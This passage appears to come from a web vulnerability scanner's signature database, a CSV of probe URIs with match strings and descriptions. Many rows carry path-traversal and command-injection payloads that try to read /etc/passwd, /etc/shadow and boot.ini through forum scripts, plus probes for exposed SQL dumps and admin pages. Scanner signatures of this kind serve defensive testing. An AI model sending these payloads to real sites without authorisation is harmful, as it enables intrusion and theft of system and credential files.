might be interesting.","","" "002101","https://en.wikipedia.org/wiki/Microsoft_FrontPage","1","/cgi-dos/args.bat","GET","200","","","","","Default FrontPage CGI found.","","" "002102","","1","/custdata/","GET","200","","","","","This may be COWS (CGI Online Worldweb Shopping), and may leak customer data.","","" "002103","","1","/hostingcontroller/","GET","200","","","","","This might be interesting: probably HostingController, www.hostingcontroller.com","","" "002104","","2","/data.sql","GET","200","","","","","Database SQL?","","" "002105","","2","/databases/","GET","200","","","","","Databases directy found.","","" "002106","","2","/database.sql","GET","200","","","","","Database SQL found.","","" "002107","","2","/db.sql","GET","200","","","","","Database SQL found.","","" "002108","","2","/etc/passwd","GET","root:","","","","","An '/etc/passwd' file is available via the web site.","","" "002109","","2","/img-sys/","GET","200","","","","","Default image directory should not allow directory listing.","","" "002110","","2","/java-sys/","GET","200","","","","","Default Java directory should not allow directory listing.","","" "002111","","2","/javadoc/","GET","200","","","","","Documentation...?","","" "002112","","2","/log/","GET","200","","","","","Ahh...log information...fun!","","" "002113","","2","/manager/","GET","200","","","","","May be a web server or site manager.","","" "002114","","2","/manual/","GET","200","","","","","Web server manual found.","","" "002115","","2","/exchange/","GET","401","","","","","This might be interesting: Outlook/Exchange OWA.","","" "002116","","3","/pls/admin","GET","ENVIRONMENT","","","","","Oracle Apache+WebDB gives a lot of system information via the pls/admin script","","" "002265","","1","/finance.xls","GET","200","","","","","Finance spreadsheet?","","" "002266","","1","/finances.xls","GET","200","","","","","Finance spreadsheet?","","" "002267","","1","/abonnement.asp","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002268","","1","/acartpath/signin.asp?|-|0|404_Object_Not_Found","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002269","","1","/add_acl","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002270","","1","/admbrowse.php?down=1&cur=%2Fetc%2F&dest=passwd&rid=1&S=[someid]","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002271","","1","/admin/auth.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002272","","1","/admin/cfg/configscreen.inc.php+","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002273","","1","/admin/cfg/configsite.inc.php+","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002274","","1","/admin/cfg/configsql.inc.php+","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002275","","1","/admin/cfg/configtache.inc.php+","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002276","","1","/admin/cms/htmltags.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002277","","1","/admin/credit_card_info.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002278","","1","/admin/exec.php3","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002279","","1","/admin/index.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002280","","1","/admin/modules/cache.php+","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002281","","1","/admin/objects.inc.php4","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002282","","1","/admin/script.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002283","","1","/admin/settings.inc.php+","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002284","","1","/admin/templates/header.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002285","","1","/admin/upload.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002286","","1","/admin_t/include/aff_liste_langue.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002287","","1","/adv/gm001-mc/","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002288","","1","/aff_news.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002289","","1","/approval/ts_app.htm","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002290","","1","/archive.asp","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002291","","1","/archive_forum.asp","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002292","","1","/ashnews.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002293","","1","/auth.inc.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002294","","1","/b2-tools/gm-2-b2.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002295","","1","/bandwidth/index.cgi","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002296","","1","/basilix.php3","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002297","","1","/bigsam_guestbook.php?displayBegin=9999...9999","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002298","","1","/bin/common/user_update_passwd.pl","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002299","","1","/biztalktracking/RawCustomSearchField.asp?|-|0|404_Object_Not_Found","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002300","","1","/biztalktracking/rawdocdata.asp?|-|0|404_Object_Not_Found","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002301","","1","/board/index.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002302","","1","/board/philboard_admin.asp+","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002303","","1","/boilerplate.asp?NFuse_Template=../../boot.ini&NFuse_CurrentFolder=/SSLx0020Directories|-|0|404_Object_Not_Found","GET","boot load","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002304","","1","/bugtest+/+","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002305","","1","/caupo/admin/admin_workspace.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002306","","1","/ccbill/whereami.cgi","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002307","","1","/chat_dir/register.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002308","","1","/checkout_payment.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002309","","1","/communique.asp","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002310","","1","/community/forumdisplay.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002311","","1","/community/index.php?analized=anything","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002312","","1","/community/member.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002313","","1","/compte.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002314","","1","/config/html/cnf_gi.htm","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002315","","1","/convert-date.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002316","","1","/cp/rac/nsManager.cgi","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002317","","3a","/CSNews.cgi?command=viewnews&database=none","GET","ENV","","","","","csNews reveals system path and other sensitive information in error messages. Also may be possible to bypass authentication mechanism.","","" "002318","","1","/csPassword.cgi?command=remove%20","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002319","","1","/cutenews/comments.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002320","","1","/cutenews/search.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002321","","1","/cutenews/shownews.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002322","","1","/Data/settings.xml+","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002323","","1","/database/metacart.mdb+","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002324","","1","/db.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002325","","1","/dbabble","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002326","","1","/dcp/advertiser.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002327","","1","/defines.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002328","","1","/dltclnt.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002329","","1","/doc/admin/index.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002330","","1","/docs/NED","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002331","","1","/dotproject/modules/files/index_table.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002332","","1","/dotproject/modules/projects/addedit.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002333","","1","/dotproject/modules/projects/view.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002334","","1","/dotproject/modules/projects/vw_files.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002335","","1","/dotproject/modules/tasks/addedit.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002336","","1","/dotproject/modules/tasks/viewgantt.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002337","","1","/do_map","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002338","","1","/do_subscribe","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002339","","1","/email.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002340","","1","/emml_email_func.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002341","","1","/emumail.cgi?type=.%00","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002342","","1","/entete.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002343","","1","/enteteacceuil.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002344","","1","/etc/shadow+","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002345","","1","/eventcal2.php.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002346","","1","/ez2000/ezadmin.cgi","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002347","","1","/ez2000/ezboard.cgi","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002348","","1","/ez2000/ezman.cgi","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002349","","1","/faqman/index.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002350","","1","/filemanager/index.php3","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002351","","1","/filemgmt/brokenfile.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002352","","1","/filemgmt/singlefile.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002353","","1","/filemgmt/viewcat.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002354","","1","/filemgmt/visit.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002355","","1","/foro/YaBB.pl","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002356","","1","/forum-ra.asp?n=....//....//....//....//....//....//....//etc.passwd","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002357","","1","/forum-ra.asp?n=../../../../../../../../../etc/passwd","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002358","","1","/forum-ra.asp?n=../../../../../../../../../etc/passwd%00","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002359","","1","/forum-ra.asp?n=/../../../../../../../../../../../boot.ini","GET","boot load","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002360","","1","/forum-ra.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini","GET","boot load","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002361","","1","/forum-ra.asp?n=/etc/passwd","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002362","","1","/forum-ra.asp?n=/etc/passwd%00","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002363","","1","/forum-ra.asp?n=c:\boot.ini","GET","boot load","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002364","","1","/forum-ra_professionnel.asp?n=%60/etc/passwd%60","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002365","","1","/forum-ra_professionnel.asp?n=../../../../../../../../../etc/passwd%00","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002366","","1","/forum-ra_professionnel.asp?n=../../boot.ini","GET","boot load","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002367","","1","/forum-ra_professionnel.asp?n=/....../boot.ini","GET","boot load","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002368","","1","/forum-ra_professionnel.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini","GET","boot load","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002369","","1","/forum-ra_professionnel.asp?n=/../../../../../../etc/passwd","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002370","","1","/forum-ra_professionnel.asp?n=/../../../etc/passwd","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002371","","1","/forum-ra_professionnel.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini","GET","boot load","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002372","","1","/forum-ra_professionnel.asp?n=/etc/passwd","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002373","","1","/forum-ra_professionnel.asp?n=/etc/passwd%00","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002374","","1","/forum-ra_professionnel.asp?n=c:\boot.ini","GET","boot load","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002375","","1","/forum.asp?n=%60/etc/passwd%60|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'`'.","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002376","","1","/forum.asp?n=../../../../../../../../../etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002377","","1","/forum.asp?n=../../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.","GET","boot load","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002378","","1","/forum.asp?n=/....../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.","GET","boot load","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002379","","1","/forum.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.","GET","boot load","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002380","","1","/forum.asp?n=/../../../../../../etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002381","","1","/forum.asp?n=/../../../etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002382","","1","/forum.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.","GET","boot load","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002383","","1","/forum.asp?n=/etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002384","","1","/forum.asp?n=/etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002385","","1","/forum.asp?n=c:\boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'c:'.","GET","boot load","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002386","","1","/forum/mainfile.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002387","","1","/forum/member.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002388","","1","/forum/newreply.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002389","","1","/forum/newthread.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002390","","b","/forum/viewtopic.php","GET","200","","","","","phpBB found.","","" "002391","","1","/forum1.asp?n=%60/etc/passwd%60&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002392","","1","/forum1.asp?n=....//....//....//....//....//....//....//etc.passwd&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002393","","1","/forum1.asp?n=../../../../../../../../../etc/passwd%00&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002394","","1","/forum1.asp?n=../../boot.ini&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.","GET","boot load","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002395","","1","/forum1.asp?n=/....../boot.ini&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.","GET","boot load","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002396","","1","/forum1.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.","GET","boot load","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002397","","1","/forum1.asp?n=/../../../../../../etc/passwd&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002398","","1","/forum1.asp?n=/../../../etc/passwd&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002399","","1","/forum1.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.","GET","boot load","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002400","","1","/forum1.asp?n=/etc/passwd%00&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002401","","1","/forum1.asp?n=/etc/passwd&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002402","","1","/forum1.asp?n=1753&nn=%60/etc/passwd%60","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002403","","1","/forum1.asp?n=1753&nn=....//....//....//....//....//....//....//etc.passwd","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002404","","1","/forum1.asp?n=1753&nn=../../../../../../../../../../etc/passwd","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002405","","1","/forum1.asp?n=1753&nn=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002406","","1","/forum1.asp?n=1753&nn=/....../boot.ini","GET","boot load","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002407","","1","/forum1.asp?n=1753&nn=/..../boot.ini","GET","boot load","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002408","","1","/forum1.asp?n=1753&nn=/../../../../../../../../../../../../../../../../../../../../boot.ini","GET","boot load","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002409","","1","/forum1.asp?n=1753&nn=/.\"./.\"./.\"./.\"./.\"./boot.ini","GET","boot load","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002410","","1","/forum1.asp?n=1753&nn=/etc/passwd","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002411","","1","/forum1.asp?n=1753&nn=/etc/passwd%00","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002412","","1","/forum1.asp?n=1753&nn=c:\boot.ini","GET","boot load","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002413","","1","/forum1.asp?n=c:\boot.ini&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.","GET","boot load","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002414","","1","/forum1_professionnel.asp?n=%60/etc/passwd%60&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002415","","1","/forum1_professionnel.asp?n=....//....//....//....//....//....//....//etc.passwd&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002416","","1","/forum1_professionnel.asp?n=../../../../../../../../../etc/passwd%00&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002417","","1","/forum1_professionnel.asp?n=/....../boot.ini&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.","GET","boot load","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002418","","1","/forum1_professionnel.asp?n=/.../.../.../.../.../.../boot.ini&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.","GET","boot load","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002419","","1","/forum1_professionnel.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.","GET","boot load","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002420","","1","/forum1_professionnel.asp?n=/../../../../../../../../etc/passwd&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002421","","1","/forum1_professionnel.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.","GET","boot load","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002422","","1","/forum1_professionnel.asp?n=/etc/passwd%00&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002423","","1","/forum1_professionnel.asp?n=/etc/passwd&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002424","","1","/forum1_professionnel.asp?n=1771&nn=%60/etc/passwd%60&page=1","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002425","","1","/forum1_professionnel.asp?n=1771&nn=....//....//....//....//....//....//....//etc.passwd&page=1","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002426","","1","/forum1_professionnel.asp?n=1771&nn=../../../../../../../../../etc/passwd%00&page=1","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002427","","1","/forum1_professionnel.asp?n=1771&nn=/....../boot.ini&page=1","GET","boot load","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002428","","1","/forum1_professionnel.asp?n=1771&nn=/../../../../../../../../../../../../../../../../../../../../boot.ini&page=1","GET","boot load","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002429","","1","/forum1_professionnel.asp?n=1771&nn=/../../../../../../../../etc/passwd&page=1","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002430","","1","/forum1_professionnel.asp?n=1771&nn=/.\"./.\"./.\"./.\"./.\"./boot.ini&page=1","GET","boot load","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002431","","1","/forum1_professionnel.asp?n=1771&nn=/etc/passwd%00&page=1","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002432","","1","/forum1_professionnel.asp?n=1771&nn=/etc/passwd&page=1","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002433","","1","/forum1_professionnel.asp?n=1771&nn=100&page=%60/etc/passwd%60","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002434","","1","/forum1_professionnel.asp?n=1771&nn=100&page=....//....//....//....//....//....//....//etc.passwd","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002435","","1","/forum1_professionnel.asp?n=1771&nn=100&page=../../../../../../../../../etc/passwd%00","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002436","","1","/forum1_professionnel.asp?n=1771&nn=100&page=/....../boot.ini","GET","boot load","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002437","","1","/forum1_professionnel.asp?n=1771&nn=100&page=/..../boot.ini","GET","boot load","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002438","","1","/forum1_professionnel.asp?n=1771&nn=100&page=/.../.../.../.../.../.../boot.ini","GET","boot load","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002439","","1","/forum1_professionnel.asp?n=1771&nn=100&page=/../../../../../../../../../../../../../../../../../../../../boot.ini","GET","boot load","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002440","","1","/forum1_professionnel.asp?n=1771&nn=100&page=/../../../../../../../../../../etc/passwd","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002441","","1","/forum1_professionnel.asp?n=1771&nn=100&page=/.\"./.\"./.\"./.\"./.\"./boot.ini","GET","boot load","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002442","","1","/forum1_professionnel.asp?n=1771&nn=100&page=/etc/passwd","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002443","","1","/forum1_professionnel.asp?n=1771&nn=100&page=/etc/passwd%00","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002444","","1","/forum1_professionnel.asp?n=1771&nn=100&page=c:\boot.ini","GET","boot load","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002445","","1","/forum1_professionnel.asp?n=1771&nn=c:\boot.ini&page=1","GET","boot load","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002446","","1","/forum1_professionnel.asp?n=c:\boot.ini&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.","GET","boot load","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002447","","1","/forum_arc.asp?n=%60/etc/passwd%60|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'`'.","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002448","","1","/forum_arc.asp?n=../../../../../../../../../etc/passwd%00|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.","GET","root:","","","","","This might be interesting: has been 